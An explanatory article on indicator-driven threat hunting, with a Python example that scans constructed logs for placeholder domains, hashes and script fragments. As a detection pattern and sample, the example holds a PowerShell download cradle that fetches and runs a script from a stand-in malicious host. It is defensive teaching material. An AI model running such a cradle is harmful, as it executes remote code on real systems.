Let’s start by understanding what threat hunting is: it is the process of looking, line by line and event by event, for indicators of very specific threats. It is not a search for anything that might be an anomaly; it is the act of detecting indicators of activity we already know to be happening. Think of checking for ticks after a walk in the woods. If you have good reason to believe there are ticks in those woods, you check whether any have hitched a ride. The benefit of hunting for them is that you can find and remove them before they bite you and make you sick.
Before a hunt can start, then, you need to know what you are looking for. That requires three things: analytics, situational awareness and intelligence. The raw information may come from many different sources, and the experts on a threat hunting team analyze it and derive meaning from it. What is the chatter on the dark web? Is anyone talking about targeting a particular company or technology? Are there discussions of new tradecraft or exploit methodologies?
The threat analysts on the hunting team may gather large amounts of raw intelligence, and that is where situational awareness helps identify which issues matter for a given organization and its users. Intelligence describing a mode of attack against a movie studio, for example, is of less immediate concern to an automobile manufacturer. The same techniques might well work against the manufacturer, but if the intelligence indicates that the campaign is focused on studios, the manufacturer’s IT teams should stay focused on the threats aimed at them. It comes back to the walk in the woods: if ticks are a problem in the woods where you hike and scorpions are not, you need to be concerned about ticks, not scorpions.
Once the threat analysts have identified the threats of concern, the hunters can begin their hunt. They may be looking for evidence of specific vulnerabilities (an improperly configured router, for example), or for known-bad code fragments, scripts, file hashes or domains showing up on hosts and in logs across their network. If they find the elements they are hunting for, they can take the appropriate action, such as isolating the host, removing the artifact or correcting the misconfiguration, and protect the enterprise before the attacker makes use of it.
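The following is an added example, not code from the original article, of what "line by line, event by event" indicator hunting looks like in practice. It takes a small indicator set of the kind the analysts would hand over (placeholder domains, a placeholder SHA-256 and a PowerShell download-cradle fragment, none of them real-world IOCs) and runs it over a handful of constructed key=value log lines. The log format, field names and indicator values are all assumptions for illustration. Note the two practitioner details: a domain in the same zone as an indicator does not match, because the hunt is for specific indicators rather than look-alikes, and a PowerShell `-EncodedCommand` argument (base64 of UTF-16LE text) is decoded before the script fragment is checked, since the indicator would otherwise never appear literally in the log.

```python
"""Indicator-driven hunt over constructed log lines (added example)."""
import base64
import re
from dataclasses import dataclass

# Indicators handed over by the analysts. Constructed for this example;
# the values are placeholders, not real-world IOCs.
INDICATORS = {
    "domain": {"update-check.example.net", "cdn.example-malicious.org"},
    "sha256": {"a" * 64},
    "script_fragment": {"IEX (New-Object Net.WebClient).DownloadString"},
}


@dataclass(frozen=True)
class Hit:
    line_no: int
    host: str
    kind: str
    value: str


# key=value or key="quoted value"; the leading timestamp has no '=' and is skipped.
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_line(line):
    """Split one log line into a dict of its key=value fields."""
    fields = {}
    for m in KV_RE.finditer(line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    return fields


def decode_encoded_command(cmdline):
    """If cmdline carries a PowerShell -e/-enc/-EncodedCommand argument,
    return the decoded script (base64 of UTF-16LE); otherwise return cmdline."""
    m = re.search(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def hunt(log_lines, indicators=INDICATORS):
    """Walk every line and report each exact indicator match as a Hit."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        f = parse_line(line)
        host = f.get("host", "?")
        if f.get("query") in indicators["domain"]:
            hits.append(Hit(n, host, "domain", f["query"]))
        if f.get("sha256") in indicators["sha256"]:
            hits.append(Hit(n, host, "sha256", f["sha256"]))
        if "cmdline" in f:
            script = decode_encoded_command(f["cmdline"])
            for frag in indicators["script_fragment"]:
                if frag in script:
                    hits.append(Hit(n, host, "script_fragment", frag))
    return hits


# Constructed sample log. The encoded command is built here so the example
# stays honest about what the log actually contains.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://cdn.example-malicious.org/a.ps1')"
    .encode("utf-16-le")
).decode()

SAMPLE_LOG = [
    "2024-03-01T09:00:01Z host=ws01 type=dns query=update-check.example.net",
    "2024-03-01T09:00:02Z host=ws01 type=dns query=login.example.net",  # same zone, not an indicator
    "2024-03-01T09:00:03Z host=ws02 type=process sha256=" + "a" * 64 + ' cmdline="C:\\Temp\\svc.exe"',
    f'2024-03-01T09:00:04Z host=ws03 type=process sha256={"b" * 64} cmdline="powershell.exe -NoP -enc {_ENCODED}"',
    "2024-03-01T09:00:05Z host=ws04 type=process sha256=" + "c" * 64 + ' cmdline="notepad.exe"',
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(f"line {h.line_no} host={h.host} {h.kind}: {h.value}")
```

Running it reports three hits: the DNS query on line 1, the file hash on line 3 and the decoded download cradle on line 4. Lines 2 and 5 are left alone, which is the point of the author's distinction between hunting for known indicators and flagging anything unusual.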